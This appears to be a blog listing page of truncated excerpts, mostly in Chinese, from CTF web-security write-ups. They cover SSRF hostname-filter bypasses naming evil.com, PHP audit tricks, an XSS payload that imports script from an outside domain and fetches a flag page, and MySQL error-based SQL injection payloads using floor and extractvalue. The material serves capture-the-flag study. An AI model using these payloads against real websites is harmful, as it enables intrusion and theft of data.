parse_url + curlLet’s open the URL and prod around. We find a search box, which can retrieve the source code of any page on https://www.google.com.
Different hostnames are all blocked. Examples are:
evil.com
hostnames that include www.google.com such as www.google.com.evil.com
URLs that includ...
签到题目:复制,粘贴
(╯°□°)╯︵ ┻━┻题目给了一个字符串1d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1b2e2e5e2b5b4e4b8b7e6e1e1b6b9e4b5e3b8b1b1e3e5b5b6b4b1b0e4e6b2fd
首先,应该想到两两一组,一组代表一个字符,考虑到DDCTF,”DD”两个字符,在字符串中找到两组相邻的字符串,找到了”c4c4”和”e1e1”:
d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0...
PHP代码审计归纳Author: 木禾 ali0th
https://github.com/Martin2877/Ali0thNotes/blob/master/Code%20Audit/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%BD%92%E7%BA%B3.md
函数trickunlink:不会删除/.结尾的文件
unlink(“index.php/.”); 这样并不会删除index.php
parse_url1if(isset($_POST['url']) && parse_url($_POST[&ap...
link 标签引入外部 js。
123也可以用域名,将 . 用 。 代替。<link rel=import href=\\八进制ip<link/rel=import href=https:\\d7cb7b72.w1n.pw\background.html>
1234567<script> var xhr = new XMLHttpRequest(); xhr.open("GET", "https://router.vip/flag.php", false); xhr.send(); a=xhr.responseText; location.href...
jquery.min.js的绝对路径:
1http://39.107.33.96:20000/static/js/jquery.min.js
当前url: http://39.107.33.96:20000/index.php/view/
html中引入jquery.min.js,相对路径:1<script src="../static/js/jquery.min.js"></script>
此时: 浏览器解析js的路径:1http://39.107.33.96:20000/index.php/static/js/jquery.min.js ...
首先我们来看两段代码:
python2.7:
12345text = 'system'text1 = ''for i in text: text1 += chr(ord(i) +10)print base64.b64encode(text1)
结果:
1fYN9fm93
python3.5:
12345text = 'system'text1 = ''for i in text: text1 += (chr(ord(i) +10))print(base64.b64encode(str.encode(text1)))
结果:
1b&apo...
报错注入函数
floor报错, Mysql5.0及以上版本都能用的报错函数:floor
select from test where id=1 and (select 1 from (select count(\),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数
ExtractValue()
select * from test where id=1 and (extractvalue(1,con...
